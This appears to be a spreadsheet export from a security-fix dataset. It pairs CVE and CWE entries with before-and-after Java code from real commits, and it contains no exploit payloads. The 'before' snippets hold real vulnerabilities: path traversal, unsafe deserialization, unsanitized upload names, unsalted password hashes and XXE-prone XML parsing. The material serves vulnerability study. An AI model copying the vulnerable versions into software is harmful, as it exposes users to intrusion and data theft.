    <t>Merge pull request #67 from tuzzmaniandevil/masterupdated OAuth2 helper to not included spaces when generating the scope</t>
  </si>
  <si>
    <t>https://github.com/miltonio/milton2/commit/b5851c1</t>
  </si>
  <si>
    <t>AclUtils.java</t>
  </si>
  <si>
    <t>b5851c1</t>
  </si>
  <si>
    <t xml:space="preserve">    
     * Recurisve function which checks the given collection of priviledges, 
     * 
     * 
     * @return 
    }      
     * Return a set containing all privs in the given collection, and also all priviledges 
     * 
</t>
  </si>
  <si>
    <t xml:space="preserve">     * Recurisve function which checks the given collection of priviledges,
     *
     *
     * @return
        if( privs == null ) {
            return false;
        }
    }
     * Return a set containing all privs in the given collection, and also all priviledges
     *
</t>
  </si>
  <si>
    <t>log returning null ACL</t>
  </si>
  <si>
    <t>CVE-2021-21234</t>
  </si>
  <si>
    <t>https://github.com/lukashinsch/spring-boot-actuator-logview/commit/1c76e1ec3588c9f39e1a94bf27b5ff56eb8b17d6</t>
  </si>
  <si>
    <t>LogViewEndpoint.java</t>
  </si>
  <si>
    <t>1c76e1ec3588c9f39e1a94bf27b5ff56eb8b17d6</t>
  </si>
  <si>
    <t xml:space="preserve">        securityCheck(base);
        securityCheck(filename);
        response.setContentType(MediaType.TEXT_PLAIN_VALUE);
    private void securityCheck(String filename) {
        Assert.doesNotContain(filename, "..");
</t>
  </si>
  <si>
    <t xml:space="preserve">        securityCheck(currentFolder, null);
        securityCheck(path, filename);
        response.setContentType(MediaType.TEXT_PLAIN_VALUE);
    private void securityCheck(Path base, String filename) {
        try {
            String canonicalLoggingPath = (filename != null ? new File(base.toFile().toString(), filename) : new File(base.toFile().toString())).getCanonicalPath();
            String baseCanonicalPath = new File(loggingPath).getCanonicalPath();
            String errorMessage = "File " + base.toString() + "/" + filename + " may not be located outside base path " + loggingPath;
            Assert.isTrue(canonicalLoggingPath.startsWith(baseCanonicalPath), errorMessage);
        } catch (IOException e) {
            throw new IllegalStateException(e);
        }
</t>
  </si>
  <si>
    <t>Merge pull request #30 from lukashinsch/hotfix/dir-traversalbackport directory traversal vulnerability fix</t>
  </si>
  <si>
    <t>https://github.com/lukashinsch/spring-boot-actuator-logview/commit/760acbb939a8d1f7d1a7dfcd51ca848eea04e772</t>
  </si>
  <si>
    <t>760acbb939a8d1f7d1a7dfcd51ca848eea04e772</t>
  </si>
  <si>
    <t>backport directory traversal vulnerability fix</t>
  </si>
  <si>
    <t>CVE-2021-21242</t>
  </si>
  <si>
    <t>https://github.com/theonedev/onedev/commit/f864053176c08f59ef2d97fea192ceca46a4d9be</t>
  </si>
  <si>
    <t>CoreModule.java</t>
  </si>
  <si>
    <t>f864053176c08f59ef2d97fea192ceca46a4d9be</t>
  </si>
  <si>
    <t xml:space="preserve">import io.onedev.server.web.component.markdown.AttachmentUploadServlet;
		bind(AttachmentUploadServlet.class);
</t>
  </si>
  <si>
    <t>Do not use deserialized AttachmentSupport from client side to avoid s……ecurity vulnerabilities</t>
  </si>
  <si>
    <t>BaseUrlMapper.java</t>
  </si>
  <si>
    <t xml:space="preserve">		add(new DynamicPathPageMapper("projects/${project}/settings/general", GeneralSecuritySettingPage.class));
</t>
  </si>
  <si>
    <t xml:space="preserve">import io.onedev.server.web.page.project.setting.general.GeneralProjectSettingPage;
		add(new DynamicPathPageMapper("projects/${project}/settings/general", GeneralProjectSettingPage.class));
</t>
  </si>
  <si>
    <t>MarkdownEditor.java</t>
  </si>
  <si>
    <t xml:space="preserve">import org.apache.commons.lang3.SerializationUtils;
import org.apache.wicket.util.crypt.Base64;
	private AbstractPostAjaxBehavior ajaxBehavior;
		container.add(ajaxBehavior = new AbstractPostAjaxBehavior() {
		String encodedAttachmentSupport;
		if (getAttachmentSupport() != null) {
			encodedAttachmentSupport = Base64.encodeBase64String(SerializationUtils.serialize(getAttachmentSupport()));
			encodedAttachmentSupport = StringUtils.deleteWhitespace(encodedAttachmentSupport);
			encodedAttachmentSupport = StringEscapeUtils.escapeEcmaScript(encodedAttachmentSupport);
			encodedAttachmentSupport = "'" + encodedAttachmentSupport + "'";
		} else {
			encodedAttachmentSupport = "undefined";
		}
		String callback = ajaxBehavior.getCallbackFunction(explicit("action"), explicit("param1"), explicit("param2"), 
				callback, 
				encodedAttachmentSupport, 
				getAttachmentSupport()!=null?getAttachmentSupport().getAttachmentMaxSize():0,
</t>
  </si>
  <si>
    <t xml:space="preserve">import java.io.IOException;
import java.net.URLEncoder;
import javax.servlet.http.HttpServletRequest;
import javax.servlet.http.HttpServletResponse;
import org.slf4j.Logger;
import org.slf4j.LoggerFactory;
	private static final Logger logger = LoggerFactory.getLogger(MarkdownEditor.class);
	private AbstractPostAjaxBehavior actionBehavior;
	private AbstractPostAjaxBehavior attachmentUploadBehavior;
		container.add(actionBehavior = new AbstractPostAjaxBehavior() {
		container.add(attachmentUploadBehavior = new AbstractPostAjaxBehavior() {
			@Override
			protected void respond(AjaxRequestTarget target) {
				Preconditions.checkNotNull(getAttachmentSupport(), "Unexpected attachment upload request");
				HttpServletRequest request = (HttpServletRequest) RequestCycle.get().getRequest().getContainerRequest();
				HttpServletResponse response = (HttpServletResponse) RequestCycle.get().getResponse().getContainerResponse();
				try {
					String fileName = URLDecoder.decode(request.getHeader("File-Name"), StandardCharsets.UTF_8.name());
					String attachmentName = getAttachmentSupport().saveAttachment(fileName, request.getInputStream());
					response.getWriter().print(URLEncoder.encode(attachmentName, StandardCharsets.UTF_8.name()));
					response.setStatus(HttpServletResponse.SC_OK);
				} catch (Exception e) {
					logger.error("Error uploading attachment.", e);
					try {
						if (e.getMessage() != null)
							response.getWriter().print(e.getMessage());
						else
							response.getWriter().print("Internal server error");
					} catch (IOException e2) {
						throw new RuntimeException(e2);
					}
					response.setStatus(HttpServletResponse.SC_INTERNAL_SERVER_ERROR);
				}
			}
		});
		String actionCallback = actionBehavior.getCallbackFunction(explicit("action"), explicit("param1"), explicit("param2"), 
		String attachmentUploadUrl = attachmentUploadBehavior.getCallbackUrl().toString();
				actionCallback, 
				getAttachmentSupport()!=null? "'" + attachmentUploadUrl + "'": "undefined", 
				getAttachmentSupport()!=null? getAttachmentSupport().getAttachmentMaxSize(): 0,
</t>
  </si>
  <si>
    <t>ProductServletConfigurator.java</t>
  </si>
  <si>
    <t xml:space="preserve">import io.onedev.server.web.component.markdown.AttachmentUploadServlet;
	private final AttachmentUploadServlet attachmentUploadServlet;
			WicketServlet wicketServlet, WebSocketManager webSocketManager, 
			AttachmentUploadServlet attachmentUploadServlet, ServletContainer jerseyServlet) {
		this.attachmentUploadServlet = attachmentUploadServlet;
		context.addServlet(new ServletHolder(attachmentUploadServlet), "/attachment_upload");
</t>
  </si>
  <si>
    <t xml:space="preserve">			WicketServlet wicketServlet, WebSocketManager webSocketManager, ServletContainer jerseyServlet) {
</t>
  </si>
  <si>
    <t>CVE-2021-21243</t>
  </si>
  <si>
    <t>https://github.com/theonedev/onedev/commit/9637fc8fa461c5777282a0021c3deb1e7a48f137</t>
  </si>
  <si>
    <t>KubernetesResource.java</t>
  </si>
  <si>
    <t>9637fc8fa461c5777282a0021c3deb1e7a48f137</t>
  </si>
  <si>
    <t xml:space="preserve">    public byte[] allocateJobCaches(byte[] cacheAllocationRequestBytes) {
		CacheAllocationRequest allocationRequest = (CacheAllocationRequest) SerializationUtils
				.deserialize(cacheAllocationRequestBytes);
				getJobToken(), allocationRequest.getCurrentTime(), allocationRequest.getInstances()));
	public void reportJobCaches(byte[] cacheInstanceBytes) {
		@SuppressWarnings("unchecked")
		Collection&lt;CacheInstance&gt; cacheInstances = (Collection&lt;CacheInstance&gt;) SerializationUtils
				.deserialize(cacheInstanceBytes);
</t>
  </si>
  <si>
    <t xml:space="preserve">import com.google.common.base.Splitter;
    public byte[] allocateJobCaches(String cacheAllocationRequestString) {
		CacheAllocationRequest cacheAllocationRequest = CacheAllocationRequest.fromString(cacheAllocationRequestString);
				getJobToken(), cacheAllocationRequest.getCurrentTime(), cacheAllocationRequest.getInstances()));
	public void reportJobCaches(String cacheInstancesString) {
		Collection&lt;CacheInstance&gt; cacheInstances = new ArrayList&lt;&gt;();
		for (String field: Splitter.on(';').omitEmptyStrings().split(cacheInstancesString))
			cacheInstances.add(CacheInstance.fromString(field));
</t>
  </si>
  <si>
    <t>Do not deserialize data from job nodes in Kubernetes resource to avoidsecurity vulnerability</t>
  </si>
  <si>
    <t>CWE-434</t>
  </si>
  <si>
    <t>CVE-2021-21245</t>
  </si>
  <si>
    <t>https://github.com/theonedev/onedev/commit/0c060153fb97c0288a1917efdb17cc426934dacb</t>
  </si>
  <si>
    <t>FilenameUtils.java</t>
  </si>
  <si>
    <t>0c060153fb97c0288a1917efdb17cc426934dacb</t>
  </si>
  <si>
    <t xml:space="preserve">package io.onedev.server.util;
public class FilenameUtils extends org.apache.commons.io.FilenameUtils {
	public static String sanitizeFilename(String fileName) {
		return fileName.replace("..", "_").replace('/', '_').replace('\\', '_');
	}
}
</t>
  </si>
  <si>
    <t>Fix the issue that uploaded file can be stored anywhere OneDev has writepermissions over</t>
  </si>
  <si>
    <t>Unrestricted Upload of File with Dangerous Type</t>
  </si>
  <si>
    <t>The software allows the attacker to upload or transfer files of dangerous types that can be automatically processed within the product's environment.</t>
  </si>
  <si>
    <t>InsertUrlPanel.java</t>
  </si>
  <si>
    <t xml:space="preserve">						attachmentName = attachmentSupport.saveAttachment(upload.getClientFileName(), is);
</t>
  </si>
  <si>
    <t xml:space="preserve">import io.onedev.server.util.FilenameUtils;
						attachmentName = attachmentSupport.saveAttachment(
								FilenameUtils.sanitizeFilename(upload.getClientFileName()), is);
</t>
  </si>
  <si>
    <t xml:space="preserve">					String fileName = URLDecoder.decode(request.getHeader("File-Name"), StandardCharsets.UTF_8.name());
</t>
  </si>
  <si>
    <t xml:space="preserve">import io.onedev.server.util.FilenameUtils;
					String fileName = FilenameUtils.sanitizeFilename(
							URLDecoder.decode(request.getHeader("File-Name"), StandardCharsets.UTF_8.name()));
</t>
  </si>
  <si>
    <t>ProjectBlobPage.java</t>
  </si>
  <si>
    <t xml:space="preserve">			String blobPath = upload.getClientFileName();
</t>
  </si>
  <si>
    <t xml:space="preserve">import io.onedev.server.util.FilenameUtils;
			String blobPath = FilenameUtils.sanitizeFilename(upload.getClientFileName());
</t>
  </si>
  <si>
    <t>CWE-862</t>
  </si>
  <si>
    <t>CVE-2021-21246</t>
  </si>
  <si>
    <t>https://github.com/theonedev/onedev/commit/a4491e5f79dc6cc96eac20972eedc8905ddf6089</t>
  </si>
  <si>
    <t>User.java</t>
  </si>
  <si>
    <t>a4491e5f79dc6cc96eac20972eedc8905ddf6089</t>
  </si>
  <si>
    <t xml:space="preserve">	@JsonView(DefaultView.class)
	@JsonView(DefaultView.class)
</t>
  </si>
  <si>
    <t>Fix the issue that user access token can be leaked via restful api</t>
  </si>
  <si>
    <t>Missing Authorization</t>
  </si>
  <si>
    <t>The software does not perform an authorization check when an actor attempts to access a resource or perform an action.</t>
  </si>
  <si>
    <t>Assuming a user with a given identity, authorization is the process of determining whether that user can access a given resource, based on the user's privileges and any permissions or other access-control specifications that apply to the resource. When access control checks are not applied, users are able to access data or perform actions that they should not be allowed to perform. This can lead to a wide range of problems, including information exposures, denial of service, and arbitrary code execution.</t>
  </si>
  <si>
    <t>CVE-2021-21248</t>
  </si>
  <si>
    <t>https://github.com/theonedev/onedev/commit/39d95ab8122c5d9ed18e69dc024870cae08d2d60</t>
  </si>
  <si>
    <t>InputSpec.java</t>
  </si>
  <si>
    <t>39d95ab8122c5d9ed18e69dc024870cae08d2d60</t>
  </si>
  <si>
    <t xml:space="preserve">	protected String escape(String string) {
</t>
  </si>
  <si>
    <t xml:space="preserve">	public static String escape(String string) {
</t>
  </si>
  <si>
    <t>Escape pattern field of build job param to prevent security vulnerabi……lity</t>
  </si>
  <si>
    <t>TextInput.java</t>
  </si>
  <si>
    <t xml:space="preserve">		
</t>
  </si>
  <si>
    <t xml:space="preserve">		pattern = InputSpec.escape(pattern);
</t>
  </si>
  <si>
    <t>CVE-2021-21249</t>
  </si>
  <si>
    <t>https://github.com/theonedev/onedev/commit/d6fc4212b1ac1e9bbe3ce444e95f9af1e3ab8b66</t>
  </si>
  <si>
    <t>VersionedYamlDoc.java</t>
  </si>
  <si>
    <t>d6fc4212b1ac1e9bbe3ce444e95f9af1e3ab8b66</t>
  </si>
  <si>
    <t xml:space="preserve">import io.onedev.server.OneDev;
			Class&lt;?&gt; type = node.getType();
			if (type.getAnnotation(Editable.class) != null &amp;&amp; !ClassUtils.isConcrete(type)) {
				ImplementationRegistry registry = OneDev.getInstance(ImplementationRegistry.class);
				for (Class&lt;?&gt; implementationClass: registry.getImplementations(node.getType())) {
					String implementationTag = new Tag("!" + implementationClass.getSimpleName()).getValue();
					if (implementationTag.equals(node.getTag().getValue()))
						return implementationClass;
			return super.getClassForNode(node);
</t>
  </si>
  <si>
    <t xml:space="preserve">import io.onedev.server.OneDev;
			if (node instanceof VersionedYamlDoc) {
				return super.getClassForNode(node);
			} else {
				Class&lt;?&gt; type = node.getType();
				if (type.getAnnotation(Editable.class) == null) {
					// Do not deserialize unknown classes to avoid security vulnerabilities
					throw new IllegalStateException(String.format("Unexpected yaml node (type: %s, tag: %s)", 
							type, node.getTag()));
				} else {
					if (!ClassUtils.isConcrete(type)) {
						ImplementationRegistry registry = OneDev.getInstance(ImplementationRegistry.class);
						for (Class&lt;?&gt; implementationClass: registry.getImplementations(node.getType())) {
							String implementationTag = new Tag("!" + implementationClass.getSimpleName()).getValue();
							if (implementationTag.equals(node.getTag().getValue()))
								return implementationClass;
						}
					}
					return super.getClassForNode(node);
</t>
  </si>
  <si>
    <t>Fix security vulnerability issue caused by SnakeYaml deserialization</t>
  </si>
  <si>
    <t>CWE-538</t>
  </si>
  <si>
    <t>CVE-2021-21250</t>
  </si>
  <si>
    <t>https://github.com/theonedev/onedev/commit/9196fd795e87dab069b4260a3590a0ea886e770f</t>
  </si>
  <si>
    <t>XmlBuildSpecMigrator.java</t>
  </si>
  <si>
    <t>9196fd795e87dab069b4260a3590a0ea886e770f</t>
  </si>
  <si>
    <t xml:space="preserve">			xmlDoc = new SAXReader().read(new StringReader(xml));
		} catch (DocumentException e) {
</t>
  </si>
  <si>
    <t xml:space="preserve">import org.xml.sax.SAXException;
			SAXReader reader = new SAXReader();
			// Prevent XXE attack as the xml might be provided by malicious users
			reader.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);
			xmlDoc = reader.read(new StringReader(xml));
		} catch (DocumentException | SAXException e) {
</t>
  </si>
  <si>
    <t>Fix XXE injection attack by disabling XML DTD handling</t>
  </si>
  <si>
    <t>Insertion of Sensitive Information into Externally-Accessible File or Directory</t>
  </si>
  <si>
    <t>The product places sensitive information into files or directories that are accessible to actors who are allowed to have access to the files, but not to the sensitive information.</t>
  </si>
  <si>
    <t>CWE-759</t>
  </si>
  <si>
    <t>CVE-2021-21253</t>
  </si>
  <si>
    <t>https://github.com/dbijaya/OnlineVotingSystem/commit/0181cb0272857696c8eb3e44fcf6cb014ff90f09</t>
  </si>
  <si>
    <t>SHA256.java</t>
  </si>
  <si>
    <t>0181cb0272857696c8eb3e44fcf6cb014ff90f09</t>
  </si>
  <si>
    <t xml:space="preserve">import java.math.BigInteger;
			// Static getInstance method is called with hashing SHA
			MessageDigest md = MessageDigest.getInstance("SHA-256");
			// digest() method called
			// to calculate message digest of an input
			// and return array of byte
			byte[] messageDigest = md.digest(password.getBytes());
			// Convert byte array into signum representation
			BigInteger no = new BigInteger(1, messageDigest);
			// Convert message digest into hex value
			String hashPass = no.toString(16);
			while (hashPass.length() &lt; 32) {
				hashPass = "0" + hashPass;
			}
			return hashPass;
</t>
  </si>
  <si>
    <t xml:space="preserve">import java.security.SecureRandom;
import java.util.Base64;
	private static final String SSHA_PREFIX = "{SSHA}";
	private static final int SSHA_256_LENGTH = 32; // SHA-256 is 32 bytes long
	private static final int SALT_LENGTH = 16; // Use a 16 byte salt
			byte[] salt = getSalt();
			String cipher = getCipher(password, salt);
			return cipher;
	public static boolean validatePassword(String password, String cipherText) {
		boolean isValid = false;
		try {
			String cipher = cipherText.substring(SSHA_PREFIX.length());
			byte[] cipherBytes = Base64.getDecoder().decode(cipher.getBytes());
			byte[] salt = new byte[SALT_LENGTH];
			System.arraycopy(cipherBytes, SSHA_256_LENGTH, salt, 0, SALT_LENGTH);
			String result = getCipher(password, salt);
			//Compare the newly hashed password taking the same salt with the input hash
			isValid = result.equals(cipherText);
		} catch (NoSuchAlgorithmException e) {
			e.printStackTrace();
		}
		return isValid;
	}
	private static byte[] getSalt() throws NoSuchAlgorithmException {
		SecureRandom random = new SecureRandom();
		byte[] salt = new byte[SALT_LENGTH];
		random.nextBytes(salt);
		return salt;
	}
	private static String getCipher(String password, byte[] salt) throws NoSuchAlgorithmException {
		// Static getInstance method is called with hashing SHA
		MessageDigest md = MessageDigest.getInstance("SHA-256");
		md.update(salt);
		byte[] passBytes = password.getBytes();
		byte[] allBytes = new byte[passBytes.length + SALT_LENGTH];
		System.arraycopy(passBytes, 0, allBytes, 0, passBytes.length);
		System.arraycopy(salt, 0, allBytes, passBytes.length, SALT_LENGTH);
		byte[] cipherBytes = new byte[SSHA_256_LENGTH + SALT_LENGTH];
		// digest() method called
		// to calculate message digest of an input
		// and return array of byte
		byte[] messageDigest = md.digest(allBytes);
		System.arraycopy(messageDigest, 0, cipherBytes, 0, SSHA_256_LENGTH);
		System.arraycopy(salt, 0, cipherBytes, SSHA_256_LENGTH, SALT_LENGTH);
		String result = SSHA_PREFIX + Base64.getEncoder().encodeToString(cipherBytes);
		return result;
	}
</t>
  </si>
  <si>
    <t>Add a salt to SHA-256 hash</t>
  </si>
  <si>
    <t>Use of a One-Way Hash without a Salt</t>
  </si>
  <si>
    <t>The software uses a one-way cryptographic hash against an input that should not be reversible, such as a password, but the software does not also use a salt as part of the input.</t>
  </si>
  <si>
    <t>This makes it easier for attackers to pre-compute the hash value using dictionary attack techniques such as rainbow tables. It should be noted that, despite common perceptions, the use of a good salt with a hash does not sufficiently increase the effort for an attacker who is targeting an individual password, or who has a large amount of computing resources available, such as with cloud-based services or specialized, inexpensive hardware. Offline password cracking can still be effective if the hash function is not expensive to compute; many cryptographic functions are designed to be efficient and can be vulnerable to attacks using massive computing resources, even if the hash is cryptographically strong. The use of a salt only slightly increases the computing requirements for an attacker compared to other strategies such as adaptive hash functions. See CWE-916 for more details.</t>
  </si>
  <si>
    <t>VoterLoginController.java</t>
  </si>
  <si>
    <t xml:space="preserve">	SHA256 sha = new SHA256();
		String password = sha.getSHA(request.getParameter("pass"));
}
</t>
  </si>
  <si>
    <t xml:space="preserve">		String password = request.getParameter("pass");
}
</t>
  </si>
  <si>
    <t>AdminDaoImpl.java</t>
  </si>
  <si>
    <t xml:space="preserve">		String sql = "select * from admin_table where admin_name=? and password=?";
			ps.setString(2,password);
				return true;
</t>
  </si>
  <si>
    <t xml:space="preserve">import javax.crypto.Cipher;
import com.bijay.onlinevotingsystem.controller.SHA256;
		String sql = "select * from admin_table where admin_name=?";
				String cipherText = rs.getString("password");
				return SHA256.validatePassword(password, cipherText);
</t>
  </si>
  <si>
    <t>VoterDaoImpl.java</t>
  </si>
  <si>
    <t xml:space="preserve">		String sql = "select * from voter_table where voter_name=? and password=? and email=?";
			ps.setString(2, password);
			ps.setString(3, email);
				return true;
</t>
  </si>
  <si>
    <t xml:space="preserve">import com.bijay.onlinevotingsystem.controller.SHA256;
		String sql = "select * from voter_table where voter_name=? and email=?";
			ps.setString(2, email);
				String cipherText = rs.getString("password");
				return SHA256.validatePassword(password, cipherText);
</t>
  </si>
  <si>
    <t>CVE-2021-21266</t>
  </si>
  <si>
    <t>https://github.com/openhab/openhab-addons/commit/81935b0ab126e6d9aebd2f6c3fc67d82bb7e8b86</t>
  </si>
  <si>
    <t>FritzAhaUpdateCallback.java</t>
  </si>
  <si>
    <t>81935b0ab126e6d9aebd2f6c3fc67d82bb7e8b86</t>
  </si>
  <si>
    <t xml:space="preserve">                DeviceListModel model = (DeviceListModel) unmarshaller.unmarshal(new StringReader(response));
            } catch (JAXBException e) {
</t>
  </si>
  <si>
    <t xml:space="preserve">import javax.xml.stream.XMLStreamException;
import javax.xml.stream.XMLStreamReader;
                XMLStreamReader xsr = JAXBUtils.XMLINPUTFACTORY.createXMLStreamReader(new StringReader(response));
                DeviceListModel model = (DeviceListModel) unmarshaller.unmarshal(xsr);
            } catch (JAXBException | XMLStreamException e) {
</t>
  </si>
  <si>
    <t>Fix XXE vulnerabilities in multiple add-onsSigned-off-by: Kai Kreuzer &lt;kai@openhab.org&gt;</t>
  </si>
  <si>
    <t>FritzAhaUpdateTemplatesCallback.java</t>
  </si>
  <si>
    <t xml:space="preserve">                TemplateListModel model = (TemplateListModel) unmarshaller.unmarshal(new StringReader(response));
            } catch (JAXBException e) {
</t>
  </si>
  <si>
    <t xml:space="preserve">import javax.xml.stream.XMLStreamException;
import javax.xml.stream.XMLStreamReader;
                XMLStreamReader xsr = JAXBUtils.XMLINPUTFACTORY.createXMLStreamReader(new StringReader(response));
                TemplateListModel model = (TemplateListModel) unmarshaller.unmarshal(xsr);
            } catch (JAXBException | XMLStreamException e) {
</t>
  </si>
  <si>
    <t>JAXBUtils.java</t>
  </si>
  <si>
    <t xml:space="preserve">import javax.xml.stream.XMLInputFactory;
    public static final XMLInputFactory XMLINPUTFACTORY = initXMLInputFactory();
    private static XMLInputFactory initXMLInputFactory() {
        XMLInputFactory xif = XMLInputFactory.newInstance();
        xif.setProperty(XMLInputFactory.IS_SUPPORTING_EXTERNAL_ENTITIES, false);
        xif.setProperty(XMLInputFactory.SUPPORT_DTD, false);
        return xif;
    }
</t>
  </si>
  <si>
    <t>XMLResponseProcessor.java</t>
  </si>
  <si>
    <t xml:space="preserve">        reader.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);
</t>
  </si>
  <si>
    <t>DenonMarantzHttpConnector.java</t>
  </si>
  <si>
    <t xml:space="preserve">                xif.setProperty(XMLInputFactory.IS_SUPPORTING_EXTERNAL_ENTITIES, false);
                xif.setProperty(XMLInputFactory.SUPPORT_DTD, false);
</t>
  </si>
  <si>
    <t>DenonMarantzHandler.java</t>
  </si>
  <si>
    <t xml:space="preserve">                    DocumentBuilder builder;
</t>
  </si>
  <si>
    <t xml:space="preserve">                        // see
                        // https://cheatsheetseries.owasp.org/cheatsheets/XML_External_Entity_Prevention_Cheat_Sheet.html
                        domFactory.setFeature("http://xml.org/sax/features/external-general-entities", false);
                        domFactory.setFeature("http://xml.org/sax/features/external-parameter-entities", false);
                        domFactory.setFeature("http://apache.org/xml/features/nonvalidating/load-external-dtd", false);
                        domFactory.setXIncludeAware(false);
                        domFactory.setExpandEntityReferences(false);
                        DocumentBuilder builder;
</t>
  </si>
  <si>
    <t>DLinkHNAPCommunication.java</t>
  </si>
  <si>
    <t xml:space="preserve">            parser = DocumentBuilderFactory.newInstance().newDocumentBuilder();
</t>
  </si>
  <si>
    <t xml:space="preserve">            DocumentBuilderFactory dbf = DocumentBuilderFactory.newInstance();
            // see https://cheatsheetseries.owasp.org/cheatsheets/XML_External_Entity_Prevention_Cheat_Sheet.html
            dbf.setFeature("http://xml.org/sax/features/external-general-entities", false);
            dbf.setFeature("http://xml.org/sax/features/external-parameter-entities", false);
            dbf.setFeature("http://apache.org/xml/features/nonvalidating/load-external-dtd", false);
            dbf.setXIncludeAware(false);
            dbf.setExpandEntityReferences(false);
            parser = dbf.newDocumentBuilder();
</t>
  </si>
  <si>
    <t>Enigma2Client.java</t>
  </si>
  <si>
    <t xml:space="preserve">        this.enigma2HttpClient = new Enigma2HttpClient(requestTimeout);
        this.factory = DocumentBuilderFactory.newInstance();
</t>
  </si>
  <si>
    <t xml:space="preserve">        enigma2HttpClient = new Enigma2HttpClient(requestTimeout);
        factory = DocumentBuilderFactory.newInstance();
        // see https://cheatsheetseries.owasp.org/cheatsheets/XML_External_Entity_Prevention_Cheat_Sheet.html
        try {
            factory.setFeature("http://xml.org/sax/features/external-general-entities", false);
            factory.setFeature("http://xml.org/sax/features/external-parameter-entities", false);
            factory.setFeature("http://apache.org/xml/features/nonvalidating/load-external-dtd", false);
            factory.setXIncludeAware(false);
            factory.setExpandEntityReferences(false);
        } catch (ParserConfigurationException e) {
            logger.warn("Failed setting parser features against XXE attacks!", e);
        }
</t>
  </si>
  <si>
    <t>Client.java</t>
  </si>
  <si>
    <t xml:space="preserve">            // see https://cheatsheetseries.owasp.org/cheatsheets/XML_External_Entity_Prevention_Cheat_Sheet.html
            documentBuilderFactory.setFeature("http://xml.org/sax/features/external-general-entities", false);
            documentBuilderFactory.setFeature("http://xml.org/sax/features/external-parameter-entities", false);
            documentBuilderFactory.setFeature("http://apache.org/xml/features/nonvalidating/load-external-dtd", false);
            documentBuilderFactory.setXIncludeAware(false);
            documentBuilderFactory.setExpandEntityReferences(false);
</t>
  </si>
  <si>
    <t>FrontierSiliconRadioApiResult.java</t>
  </si>
  <si>
    <t xml:space="preserve">        // see https://cheatsheetseries.owasp.org/cheatsheets/XML_External_Entity_Prevention_Cheat_Sheet.html
        factory.setFeature("http://xml.org/sax/features/external-general-entities", false);
        factory.setFeature("http://xml.org/sax/features/external-parameter-entities", false);
        factory.setFeature("http://apache.org/xml/features/nonvalidating/load-external-dtd", false);
        factory.setXIncludeAware(false);
        factory.setExpandEntityReferences(false);
</t>
  </si>
  <si>
    <t>StatusFileInterpreter.java</t>
  </si>
  <si>
    <t xml:space="preserve">            DocumentBuilder builder = DocumentBuilderFactory.newInstance().newDocumentBuilder();
</t>
  </si>
  <si>
    <t xml:space="preserve">            DocumentBuilderFactory factory = DocumentBuilderFactory.newInstance();
            // see https://cheatsheetseries.owasp.org/cheatsheets/XML_External_Entity_Prevention_Cheat_Sheet.html
            factory.setFeature("http://xml.org/sax/features/external-general-entities", false);
            factory.setFeature("http://xml.org/sax/features/external-parameter-entities", false);
            factory.setFeature("http://apache.org/xml/features/nonvalidating/load-external-dtd", false);
            factory.setXIncludeAware(false);
            factory.setExpandEntityReferences(false);
            DocumentBuilder builder = factory.newDocumentBuilder();
</t>
  </si>
  <si>
    <t>XmlRpcResponse.java</t>
  </si>
  <si>
    <t xml:space="preserve">        factory.setFeature("http://xml.org/sax/features/external-general-entities", false);
        saxParser.getXMLReader().setFeature("http://xml.org/sax/features/external-general-entities", false);
        factory.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);
</t>
  </si>
  <si>
    <t>HPWebServerClient.java</t>
  </si>
  <si>
    <t xml:space="preserve">     * 
     * 
     * 
</t>
  </si>
  <si>
    <t xml:space="preserve">     *
     *
     *
        // see https://cheatsheetseries.owasp.org/cheatsheets/XML_External_Entity_Prevention_Cheat_Sheet.html
        factory.setFeature("http://xml.org/sax/features/external-general-entities", false);
        factory.setFeature("http://xml.org/sax/features/external-parameter-entities", false);
        factory.setFeature("http://apache.org/xml/features/nonvalidating/load-external-dtd", false);
        factory.setXIncludeAware(false);
        factory.setExpandEntityReferences(false);
</t>
  </si>
  <si>
    <t>ProjectFileUtils.java</t>
  </si>
  <si>
    <t xml:space="preserve">            // see https://cheatsheetseries.owasp.org/cheatsheets/XML_External_Entity_Prevention_Cheat_Sheet.html
            dbFactory.setFeature("http://xml.org/sax/features/external-general-entities", false);
            dbFactory.setFeature("http://xml.org/sax/features/external-parameter-entities", false);
            dbFactory.setFeature("http://apache.org/xml/features/nonvalidating/load-external-dtd", false);
            dbFactory.setXIncludeAware(false);
            dbFactory.setExpandEntityReferences(false);
</t>
  </si>
  <si>
    <t>DeviceTypeLoader.java</t>
  </si>
  <si>
    <t xml:space="preserve">        // see https://cheatsheetseries.owasp.org/cheatsheets/XML_External_Entity_Prevention_Cheat_Sheet.html
        dbFactory.setFeature("http://xml.org/sax/features/external-general-entities", false);
        dbFactory.setFeature("http://xml.org/sax/features/external-parameter-entities", false);
        dbFactory.setFeature("http://apache.org/xml/features/nonvalidating/load-external-dtd", false);
        dbFactory.setXIncludeAware(false);
        dbFactory.setExpandEntityReferences(false);
</t>
  </si>
  <si>
    <t>FeatureTemplateLoader.java</t>
  </si>
  <si>
    <t>XMLMessageReader.java</t>
  </si>
  <si>
    <t>OnkyoHandler.java</t>
  </si>
  <si>
    <t xml:space="preserve">            // see https://cheatsheetseries.owasp.org/cheatsheets/XML_External_Entity_Prevention_Cheat_Sheet.html
            factory.setFeature("http://xml.org/sax/features/external-general-entities", false);
            factory.setFeature("http://xml.org/sax/features/external-parameter-entities", false);
            factory.setFeature("http://apache.org/xml/features/nonvalidating/load-external-dtd", false);
            factory.setXIncludeAware(false);
            factory.setExpandEntityReferences(false);
</t>
  </si>
  <si>
    <t>SamsungTvUtils.java</t>
  </si>
  <si>
    <t>SonosXMLParser.java</t>
  </si>
  <si>
    <t>TelldusLiveDeviceController.java</t>
  </si>
  <si>
    <t xml:space="preserve">        xif.setProperty(XMLInputFactory.IS_SUPPORTING_EXTERNAL_ENTITIES, false);
        xif.setProperty(XMLInputFactory.SUPPORT_DTD, false);
</t>
  </si>
  <si>
    <t>CWE-379</t>
  </si>
  <si>
    <t>CVE-2021-21290</t>
  </si>
  <si>
    <t>https://github.com/netty/netty/commit/c735357bf29d07856ad171c6611a2e1a0e0000ec</t>
  </si>
  <si>
    <t>AbstractDiskHttpData.java</t>
  </si>
  <si>
    <t>c735357bf29d07856ad171c6611a2e1a0e0000ec</t>
  </si>
  <si>
    <t xml:space="preserve">            tmpFile = File.createTempFile(getPrefix(), newpostfix);
            tmpFile = File.createTempFile(getPrefix(), newpostfix, new File(
</t>
  </si>
  <si>
    <t xml:space="preserve">import io.netty.util.internal.PlatformDependent;
